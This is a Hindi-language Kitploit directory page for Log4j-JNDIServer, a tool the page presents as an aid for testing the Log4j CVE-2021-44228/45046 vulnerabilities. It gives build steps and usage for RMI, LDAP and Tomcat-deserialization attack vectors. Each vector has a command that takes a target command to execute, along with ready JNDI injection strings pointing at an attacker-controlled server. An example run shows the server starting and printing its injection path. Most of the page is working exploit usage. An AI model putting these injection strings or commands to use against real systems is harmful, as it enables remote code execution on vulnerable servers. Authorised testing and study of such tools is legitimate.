Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4j-JNDIServer — यह प्रोजेक्ट Log4j CVE-2021-44228 भेद्यता के परीक्षण में मदद करेगा। | Kitploit
उपकरण/GitHubGitHub/immunityinc/log4j-jndiserver
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

यह प्रोजेक्ट Log4j CVE-2021-44228 भेद्यता के परीक्षण में मदद करेगा।

रिपॉजिटरी देखें
9254 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4j-JNDIServer

यह परियोजना Log4j CVE‑2021‑44228/CVE‑2021‑45046 कमजोरियों का परीक्षण करने में मदद करेगी।

स्थापना और निर्माण

  • Intellij Idea पर प्रोजेक्ट लोड करें
  • "प्रोजेक्ट सेटिंग्स" (CTRL + ALT + SHIFT + S) में JDK चुनें
  • "प्रोजेक्ट सेटिंग्स" में, आर्टिफैक्ट बनाएं -> "आर्टिफैक्ट्स" -> "मॉड्यूल से JAR बनाएं" -> "लाइब्रेरीज़ से JAR फ़ाइलें" में, "target JAR में निकालें" चिह्नित करें -> "ठीक"
  • प्रोजेक्ट बनाएं (CTRL + F9). यह /out/artifacts/ फ़ोल्डर में jar फ़ाइल बनाएगा।

Maven के साथ निर्माण

Java 1.8+ और Maven 3.x+ की आवश्यकता है

  • mvn clean package -DskipTests
  • आपको /target फ़ोल्डर में .jar फ़ाइल मिलेगी।

उपयोग

1. RMI हमला वेक्टर

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

आपको अब Exploit.class होस्ट करने की आवश्यकता नहीं है। ऐप संकेतित पोर्ट पर एक HTTP सर्वर शुरू करेगा।

आपको लक्ष्य में चलाने के लिए कमांड बताना होगा।

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2. LDAP हमला वेक्टर

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

आपको अब Exploit.class होस्ट करने की आवश्यकता नहीं है। ऐप संकेतित पोर्ट पर एक HTTP सर्वर शुरू करेगा।

आपको लक्ष्य में चलाने के लिए कमांड बताना होगा।

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3. डिसीरियलाइज़ेशन हमला वेक्टर (Tomcat पेलोड का उपयोग करके)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

उदाहरण

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
टूल डाउनलोड करें